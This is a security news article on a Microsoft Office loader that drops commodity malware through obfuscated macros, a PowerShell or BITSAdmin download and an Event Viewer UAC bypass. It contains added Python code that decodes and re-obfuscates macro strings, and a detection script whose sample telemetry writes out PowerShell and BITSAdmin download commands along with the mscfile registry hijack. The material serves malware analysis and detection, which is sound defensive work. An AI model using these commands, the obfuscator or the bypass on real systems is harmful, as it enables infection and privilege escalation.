Office Loader Uses Macros to Drop Array of Malware

A recently discovered Microsoft Office loader uses malicious macros to drop multiple malware families, Palo Alto Networks security researchers warn.


More than 650 unique samples of this loader have been observed since initial detection in early December 2016, accounting for 12,000 malicious sessions targeting numerous industries. The loader, researchers say, is being delivered via email and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to compromise targeted systems.

The roughly 12,000 phishing sessions distributing the loader used a variety of subject lines, claiming to be purchase orders, requests for quotation, purchase enquiries, email verification notifications, and the like. The attached malicious documents masqueraded as invoices, product lists, deposit slips, document scans, and similar business paperwork.

High Tech, Professional and Legal Services, and Government were some of the most affected industries, Palo Alto Networks says. However, the distribution campaigns leveraging this loader have been targeting other sectors as well, including Wholesale, Telecoms, and Services.

Some of the malware families dropped using this loader included LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.

“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns,” the security researchers say.

The loader's macros are obfuscated with large amounts of garbage code and randomly named variables, which led the researchers to conclude that a builder generated them. The first half of each macro holds a function that decodes the obfuscated strings; the decoded strings are then executed through a PowerShell command. The decoding itself is trivial: the macro removes from each obfuscated string every character that appears in a hard-coded blacklist string, and whatever remains is the plaintext. The second half of the macro contains more garbage code, the obfuscated strings themselves, and, in roughly half of the samples, decoy text that the macro writes into the body of the Word document, chosen to match the lure suggested by the email subject line and the attachment's filename.
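The blacklist-stripping scheme described above is easy to reproduce on both sides. The following is an added example, not code from the Palo Alto Networks write-up or from the loader itself: a decoder that drops blacklisted characters, a builder-style obfuscator that shows why per-sample string literals vary while the payload does not, and a helper that decodes every string literal in a macro body and flags the ones that turn out to be commands rather than decoy text. The macro snippet, the blacklist `^~#`, the variable names and the decoy sentence are all constructed for the example.

```python
import random
import re
from typing import List, Tuple

# Tokens whose presence in a decoded literal makes it worth a second look.
SUSPICIOUS_TOKENS = ("powershell", "bitsadmin", "downloadfile", "mscfile", "eventvwr", "%temp%")


def decode_blacklist(obfuscated: str, blacklist: str) -> str:
    """Recover the plaintext by dropping every character that appears in the blacklist.

    This is the whole decoding scheme the article describes: no key schedule,
    no arithmetic, just a character filter.
    """
    return "".join(ch for ch in obfuscated if ch not in blacklist)


def obfuscate_blacklist(plaintext: str, blacklist: str, seed: int = 7, max_junk: int = 3) -> str:
    """Builder-side counterpart: sprinkle junk characters drawn from the blacklist
    between the plaintext characters. A different seed yields a different-looking
    literal that decodes to the same command, which is why the literals themselves
    make poor signatures."""
    if any(ch in blacklist for ch in plaintext):
        raise ValueError("plaintext must not contain blacklist characters")
    rng = random.Random(seed)
    pieces = []
    for ch in plaintext:
        pieces.append("".join(rng.choice(blacklist) for _ in range(rng.randint(0, max_junk))))
        pieces.append(ch)
    return "".join(pieces)


# Matches a VBA double-quoted literal; a doubled quote inside a literal is an escaped quote.
VBA_STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')


def decode_macro_strings(vba_text: str, blacklist: str) -> List[Tuple[str, str]]:
    """Decode every string literal in a macro body with the given blacklist and return
    (decoded_text, matched_token) for those that look like code rather than decoy text."""
    hits: List[Tuple[str, str]] = []
    for match in VBA_STRING_LITERAL.finditer(vba_text):
        decoded = decode_blacklist(match.group(1).replace('""', '"'), blacklist)
        lowered = decoded.lower()
        for token in SUSPICIOUS_TOKENS:
            if token in lowered:
                hits.append((decoded, token))
                break
    return hits


# Constructed sample, not a real macro: the blacklist literal, one hand-obfuscated
# command string, and one decoy string of the kind written into the document body.
SAMPLE_BLACKLIST = "^~#"
SAMPLE_MACRO = (
    'Dim qz As String\n'
    'qz = "^~#"\n'
    'Dim a1 As String\n'
    'a1 = "p^o~w#e^r~s#h^e~l#l^ ~-#w^ ~h#i^d~d#e^n"\n'
    'ActiveDocument.Content.InsertAfter "Invoice 4471 attached, see details below"\n'
)

if __name__ == "__main__":
    for decoded, token in decode_macro_strings(SAMPLE_MACRO, SAMPLE_BLACKLIST):
        print(f"[{token}] {decoded}")
    round_trip = obfuscate_blacklist("bitsadmin /transfer job", SAMPLE_BLACKLIST)
    print(round_trip, "->", decode_blacklist(round_trip, SAMPLE_BLACKLIST))
```

In practice the blacklist is recovered from the decode function itself (it is the one literal the function compares characters against), after which every other literal in the macro can be decoded in one pass; the decoy strings come out unchanged because the builder never inserts blacklist characters into them.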

One of the decoded functions downloads a payload via PowerShell and drops it in the %TEMP% directory. The macro then creates a registry key pointing at the dropped file and abuses Windows Event Viewer to bypass UAC and run the payload with elevated privileges. The registry key is what makes the bypass work: Event Viewer (eventvwr.exe) runs auto-elevated and consults a per-user file-handler entry in the registry before the machine-wide one, so pointing that entry at the dropped file causes Event Viewer to launch it at high integrity without a UAC prompt. The dropped file is deleted afterwards.

The UAC bypass was first detailed publicly in August 2016 and has since been used in various campaigns, including some distributing ransomware.

A small set of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware. This was seen in 11 samples from early December 2016, when the loader first appeared; the attackers subsequently switched to PowerShell.
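The download-then-elevate chain described in the preceding paragraphs (PowerShell or BITSAdmin fetching a file into %TEMP%, a registry key pointing at it, Event Viewer launching it elevated) leaves three telemetry artefacts that are easy to alert on. The detection below is an added example, not something from the Palo Alto Networks report: it runs three rules over Sysmon-style process-creation (Event ID 1) and registry-value-set (Event ID 13) records. The field names follow Sysmon's, the events are constructed for the example, the host and file names are invented, and the registry path matched is the per-user `mscfile` handler that the August 2016 eventvwr.exe technique relies on (the article does not name the key; that detail is supplied here).

```python
import ntpath
import re
from typing import Dict, List, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOADER_IMAGES = {"powershell.exe", "bitsadmin.exe"}

# Per-user handler for .msc files. Auto-elevated eventvwr.exe consults it before the
# machine-wide handler, so a value here pointing at a dropped file yields a UAC bypass.
# On a clean host this key does not normally exist, so any write to it is suspicious.
MSCFILE_HANDLER = re.compile(r"\\software\\classes\\mscfile\\shell\\open\\command$", re.IGNORECASE)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any platform)."""
    return ntpath.basename(path).lower()


def detect(events: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Return (rule_name, evidence) for every event that matches one of three rules."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        eid = ev.get("EventID")
        image = _base(str(ev.get("Image", "")))
        parent = _base(str(ev.get("ParentImage", "")))
        # Rule 1: an Office process launching the loader's downloader of choice.
        if eid == 1 and parent in OFFICE_IMAGES and image in DOWNLOADER_IMAGES:
            findings.append(("office_spawns_downloader", str(ev.get("CommandLine", ""))))
        # Rule 2: the per-user mscfile handler being written at all.
        if eid == 13 and MSCFILE_HANDLER.search(str(ev.get("TargetObject", ""))):
            findings.append(("mscfile_handler_written", str(ev.get("Details", ""))))
        # Rule 3: eventvwr.exe spawning anything other than mmc.exe.
        if eid == 1 and parent == "eventvwr.exe" and image != "mmc.exe":
            findings.append(("eventvwr_unexpected_child", str(ev.get("Image", ""))))
    return findings


# Constructed sample telemetry (not real logs): the chain the article describes,
# plus one benign eventvwr.exe -> mmc.exe launch that must not fire.
WINWORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
TEMP_DROP = r"C:\Users\alice\AppData\Local\Temp\hKx91.exe"
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "ParentImage": WINWORD,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
                    "'http://example.invalid/x', $env:TEMP + '\\hKx91.exe')"},
    {"EventID": 13, "Image": WINWORD,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\mscfile\shell\open\command",
     "Details": TEMP_DROP},
    {"EventID": 1, "ParentImage": WINWORD, "Image": r"C:\Windows\System32\eventvwr.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\mmc.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe", "Image": TEMP_DROP},
    {"EventID": 1, "ParentImage": WINWORD, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer job /download /priority high "
                    "http://example.invalid/y %TEMP%\\hKx91.exe"},
]

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

Rule 2 is the high-confidence one: the handler key is not populated on a normal workstation, so a single write is enough to alert on regardless of what the value points at. Rule 1 catches the BITSAdmin variant as well as the PowerShell one, and Rule 3 survives a change of download method entirely, since it keys on the elevation step rather than the fetch.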

“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns. It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families,” Palo Alto researchers conclude.

Related: Macro Malware Comes to macOS

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
